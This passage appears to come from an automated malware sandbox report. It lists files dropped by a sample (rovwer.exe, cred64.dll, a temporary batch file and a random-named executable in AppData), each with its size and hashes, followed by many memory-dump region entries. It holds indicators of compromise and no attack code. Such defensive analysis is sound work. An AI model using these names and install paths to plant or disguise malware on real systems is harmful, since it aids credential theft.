1ff9351d8e21a84ef6fd2cf7d43c2fa0e723e1a3

SHA256
8ef50bce8ef53fde3c1562c19972ee96c9e578bbfb8fbb3acbfc3a303c96264d

SHA512
f36271daedb926312bd4f3b8ca327e308b25762488aeae12b8909e33b0070d7e613fe1825907fa6ba46fba95c37d243c73a9c81f7dc7675cd5e0ced98a3c6d2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\39B0.exe

Filesize
358KB

MD5
59025eadba16668c5a34e389d1de1e18

SHA1
1ff9351d8e21a84ef6fd2cf7d43c2fa0e723e1a3

SHA256
8ef50bce8ef53fde3c1562c19972ee96c9e578bbfb8fbb3acbfc3a303c96264d

SHA512
f36271daedb926312bd4f3b8ca327e308b25762488aeae12b8909e33b0070d7e613fe1825907fa6ba46fba95c37d243c73a9c81f7dc7675cd5e0ced98a3c6d2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe

Filesize
358KB

MD5
59025eadba16668c5a34e389d1de1e18

SHA1
1ff9351d8e21a84ef6fd2cf7d43c2fa0e723e1a3

SHA256
8ef50bce8ef53fde3c1562c19972ee96c9e578bbfb8fbb3acbfc3a303c96264d

SHA512
f36271daedb926312bd4f3b8ca327e308b25762488aeae12b8909e33b0070d7e613fe1825907fa6ba46fba95c37d243c73a9c81f7dc7675cd5e0ced98a3c6d2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe

Filesize
358KB

MD5
59025eadba16668c5a34e389d1de1e18

SHA1
1ff9351d8e21a84ef6fd2cf7d43c2fa0e723e1a3

SHA256
8ef50bce8ef53fde3c1562c19972ee96c9e578bbfb8fbb3acbfc3a303c96264d

SHA512
f36271daedb926312bd4f3b8ca327e308b25762488aeae12b8909e33b0070d7e613fe1825907fa6ba46fba95c37d243c73a9c81f7dc7675cd5e0ced98a3c6d2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe

Filesize
358KB

MD5
59025eadba16668c5a34e389d1de1e18

SHA1
1ff9351d8e21a84ef6fd2cf7d43c2fa0e723e1a3

SHA256
8ef50bce8ef53fde3c1562c19972ee96c9e578bbfb8fbb3acbfc3a303c96264d

SHA512
f36271daedb926312bd4f3b8ca327e308b25762488aeae12b8909e33b0070d7e613fe1825907fa6ba46fba95c37d243c73a9c81f7dc7675cd5e0ced98a3c6d2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp326A.tmp.bat

Filesize
153B

MD5
939c2dcb00b1da8233c1be3313a96c24

SHA1
fb632d7419461a7f3597db85409471869f8cf804

SHA256
8e0fa7a2f661ffda5d88fbf2feec1340cedee888263d0608a1031f583530eafb

SHA512
ddef05ebbab21c31e29722b0ec71bac35e936b39eb538b84e59b279b84d4ec1da29f5f88584d4f05f30e52ef896385586a711d80ab79f666128d7a8e4d8378aa

Download Submit
C:\Users\Admin\AppData\Roaming\80b59841e5c623\cred64.dll

Filesize
126KB

MD5
522adad0782501491314a78c7f32006b

SHA1
e487edceeef3a41e2a8eea1e684bcbc3b39adb97

SHA256
351fd9b73fa0cbbdfbce0793ca41544f5191650d79317a34024f3c09f73ac9ba

SHA512
5f8a103deea3ed5f8641d1f4c91a4f891a8208b679cadbfac4a068afbad0d2f777cd29ace4bdfec590e722435473e4f8465fb80d5cda792dc0236646580101a7

Download Submit
C:\Users\Admin\AppData\Roaming\ubCKsAUBHChhUECKCUSECFsUHShuCFSHhCFChHACHScABCCHACaFefF.exe

Filesize
836KB

MD5
1bbb1d9e17adaaad085bafb9e2e8c442

SHA1
35f4e43baf2927ea0dc39d1b172cfb80288936fa

SHA256
24944e8051ae3a2031c035c1b30a5e0f044d35ee71c4706aa615eb0039d3727b

SHA512
358314b132b0a433248fde530d77177dcab054006f209e7589251743fcd8f4cd8ebdae229c42e6b81ce8f256bde91f59233db1a83e324255fc8fb6ffe86df4e0

Download Submit
C:\Users\Admin\AppData\Roaming\ubCKsAUBHChhUECKCUSECFsUHShuCFSHhCFChHACHScABCCHACaFefF.exe

Filesize
836KB

MD5
1bbb1d9e17adaaad085bafb9e2e8c442

SHA1
35f4e43baf2927ea0dc39d1b172cfb80288936fa

SHA256
24944e8051ae3a2031c035c1b30a5e0f044d35ee71c4706aa615eb0039d3727b

SHA512
358314b132b0a433248fde530d77177dcab054006f209e7589251743fcd8f4cd8ebdae229c42e6b81ce8f256bde91f59233db1a83e324255fc8fb6ffe86df4e0

Download Submit
\Users\Admin\AppData\Roaming\80b59841e5c623\cred64.dll

Filesize
126KB

MD5
522adad0782501491314a78c7f32006b

SHA1
e487edceeef3a41e2a8eea1e684bcbc3b39adb97

SHA256
351fd9b73fa0cbbdfbce0793ca41544f5191650d79317a34024f3c09f73ac9ba

SHA512
5f8a103deea3ed5f8641d1f4c91a4f891a8208b679cadbfac4a068afbad0d2f777cd29ace4bdfec590e722435473e4f8465fb80d5cda792dc0236646580101a7

Download Submit
memory/316-428-0x0000000000000000-mapping.dmp

Download
memory/316-1022-0x0000000003060000-0x0000000003066000-memory.dmp

Filesize
24KB

Download
memory/316-725-0x0000000003050000-0x000000000305B000-memory.dmp

Filesize
44KB

Download
memory/316-703-0x0000000003060000-0x0000000003066000-memory.dmp

Filesize
24KB

Download
memory/428-237-0x0000000000000000-mapping.dmp

Download
memory/552-355-0x00000000012E0000-0x00000000012EC000-memory.dmp

Filesize
48KB

Download
memory/552-728-0x00000000012F0000-0x00000000012F6000-memory.dmp

Filesize
24KB

Download
memory/552-352-0x00000000012F0000-0x00000000012F6000-memory.dmp

Filesize
24KB

Download
memory/552-339-0x0000000000000000-mapping.dmp

Download
memory/1080-697-0x0000000002D40000-0x0000000002D67000-memory.dmp

Filesize
156KB

Download
memory/1080-944-0x0000000002D70000-0x0000000002D92000-memory.dmp

Filesize
136KB

Download
memory/1080-657-0x0000000002D70000-0x0000000002D92000-memory.dmp

Filesize
136KB

Download
memory/1080-363-0x0000000000000000-mapping.dmp

Download
memory/1584-192-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1584-296-0x0000000009030000-0x0000000009042000-memory.dmp

Filesize
72KB

Download
memory/1584-279-0x000000000B470000-0x000000000B57A000-memory.dmp

Filesize
1.0MB

Download
memory/1584-273-0x0000000009C10000-0x000000000A216000-memory.dmp

Filesize
6.0MB

Download
memory/1584-301-0x0000000009BD0000-0x0000000009C0E000-memory.dmp

Filesize
248KB

Download
memory/1584-309-0x000000000B580000-0x000000000B5CB000-memory.dmp

Filesize
300KB

Download
memory/1584-498-0x0000000009710000-0x00000000097A2000-memory.dmp

Filesize
584KB

Download
memory/1584-513-0x000000000C580000-0x000000000CA7E000-memory.dmp

Filesize
5.0MB

Download
memory/1584-182-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/1584-540-0x00000000097B0000-0x0000000009816000-memory.dmp

Filesize
408KB

Download
memory/1584-191-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1584-190-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1584-189-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1584-734-0x000000000D530000-0x000000000DA5C000-memory.dmp

Filesize
5.2MB

Download
memory/1584-733-0x000000000CA80000-0x000000000CC42000-memory.dmp

Filesize
1.8MB

Download
memory/1584-188-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/1584-187-0x00000000004221AE-mapping.dmp

Download
memory/1852-223-0x0000000000000000-mapping.dmp

Download
memory/1852-227-0x0000000000F80000-0x0000000001056000-memory.dmp

Filesize
856KB

Download
memory/2276-388-0x0000000000000000-mapping.dmp

Download
memory/2796-145-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-134-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-138-0x0000000002FB1000-0x0000000002FC6000-memory.dmp

Filesize
84KB

Download
memory/2796-140-0x0000000002C40000-0x0000000002D8A000-memory.dmp

Filesize
1.3MB

Download
memory/2796-120-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-153-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-141-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-142-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-154-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-155-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-137-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-143-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-152-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-144-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-146-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-147-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-148-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-149-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-151-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-136-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-135-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-139-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-150-0x0000000000400000-0x0000000002C3E000-memory.dmp

Filesize
40.2MB

Download
memory/2796-133-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-132-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-157-0x0000000000400000-0x0000000002C3E000-memory.dmp

Filesize
40.2MB

Download
memory/2796-131-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-130-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-129-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-128-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-127-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-126-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-125-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-124-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-123-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-156-0x0000000002FB1000-0x0000000002FC6000-memory.dmp

Filesize
84KB

Download
memory/2796-122-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2796-121-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/2952-471-0x0000000000000000-mapping.dmp

Download
memory/2952-503-0x00000000008D0000-0x00000000008D7000-memory.dmp

Filesize
28KB

Download
memory/2952-509-0x00000000008C0000-0x00000000008CD000-memory.dmp

Filesize
52KB

Download
memory/3112-530-0x00000000025A0000-0x00000000025A5000-memory.dmp

Filesize
20KB

Download
memory/3112-314-0x0000000000000000-mapping.dmp

Download
memory/3112-880-0x00000000025A0000-0x00000000025A5000-memory.dmp

Filesize
20KB

Download
memory/3112-576-0x0000000002590000-0x0000000002599000-memory.dmp

Filesize
36KB

Download
memory/3252-1182-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/3252-1180-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/3252-1174-0x000000014006EE80-mapping.dmp

Download
memory/3308-652-0x0000000000400000-0x0000000002C48000-memory.dmp

Filesize
40.3MB

Download
memory/3308-254-0x0000000000000000-mapping.dmp

Download
memory/3308-516-0x0000000002E11000-0x0000000002E30000-memory.dmp

Filesize
124KB

Download
memory/3308-523-0x0000000002CC0000-0x0000000002E0A000-memory.dmp

Filesize
1.3MB

Download
memory/3308-710-0x0000000000400000-0x0000000002C48000-memory.dmp

Filesize
40.3MB

Download
memory/3308-686-0x0000000002E11000-0x0000000002E30000-memory.dmp

Filesize
124KB

Download
memory/3312-213-0x0000000000D00000-0x0000000000E20000-memory.dmp

Filesize
1.1MB

Download
memory/3312-208-0x0000000000000000-mapping.dmp

Download
memory/3708-510-0x0000000000000000-mapping.dmp

Download
memory/3708-726-0x0000000002C50000-0x0000000002C58000-memory.dmp

Filesize
32KB

Download
memory/3708-727-0x0000000002C40000-0x0000000002C4B000-memory.dmp

Filesize
44KB

Download
memory/3708-1085-0x0000000002C50000-0x0000000002C58000-memory.dmp

Filesize
32KB

Download
memory/3968-172-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-162-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-178-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-180-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-177-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-176-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-158-0x0000000000000000-mapping.dmp

Download
memory/3968-181-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-175-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-174-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-160-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-161-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-179-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-173-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-163-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-164-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-165-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-167-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-171-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-168-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-169-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/3968-170-0x0000000077570000-0x00000000776FE000-memory.dmp

Filesize
1.6MB

Download
memory/4020-247-0x0000000000000000-mapping.dmp

Download
memory/4260-561-0x0000000000000000-mapping.dmp

Download
memory/4304-245-0x0000000000000000-mapping.dmp

Download
memory/4328-1183-0x0000000000000000-mapping.dmp

Download
memory/4520-735-0x0000000002E20000-0x0000000002E27000-memory.dmp

Filesize
28KB

Download
memory/4520-272-0x0000000000000000-mapping.dmp

Download
memory/4520-457-0x0000000002E10000-0x0000000002E1B000-memory.dmp

Filesize
44KB

Download
memory/4520-417-0x0000000002E20000-0x0000000002E27000-memory.dmp

Filesize
28KB

Download
memory/4584-233-0x0000000000000000-mapping.dmp

Download
memory/4584-249-0x0000000000B00000-0x00000000012E9000-memory.dmp

Filesize
7.9MB

Download
memory/4584-238-0x0000000000B00000-0x00000000012E9000-memory.dmp

Filesize
7.9MB

Download
memory/4652-829-0x0000000000000000-mapping.dmp

Download
memory/4756-292-0x0000000000000000-mapping.dmp

Download
memory/4756-724-0x00000000010F0000-0x00000000010F9000-memory.dmp

Filesize
36KB

Download
memory/4756-303-0x00000000010F0000-0x00000000010F9000-memory.dmp

Filesize
36KB

Download
memory/4756-306-0x00000000010E0000-0x00000000010EF000-memory.dmp

Filesize
60KB

Download
memory/4872-1177-0x0000000000000000-mapping.dmp

Download
memory/4916-343-0x0000000000000000-mapping.dmp

Download
memory/4920-1179-0x0000000002D40000-0x0000000002E8A000-memory.dmp

Filesize
1.3MB

Download
memory/4920-1178-0x0000000002D40000-0x0000000002E8A000-memory.dmp

Filesize
1.3MB

Download
memory/4920-1181-0x0000000000400000-0x0000000002C48000-memory.dmp

Filesize
40.3MB

Download
memory/4920-854-0x0000000000400000-0x0000000002C48000-memory.dmp

Filesize
40.3MB

Download
memory/4920-782-0x0000000002D40000-0x0000000002E8A000-memory.dmp

Filesize
1.3MB

Download
memory/4920-779-0x0000000002D40000-0x0000000002E8A000-memory.dmp

Filesize
1.3MB

Download
memory/4920-678-0x0000000000000000-mapping.dmp

Download
memory/4924-395-0x0000000000000000-mapping.dmp

Download
memory/4924-660-0x0000000002EA0000-0x0000000002EA5000-memory.dmp

Filesize
20KB

Download
memory/4924-700-0x0000000002E90000-0x0000000002E99000-memory.dmp

Filesize
36KB

Download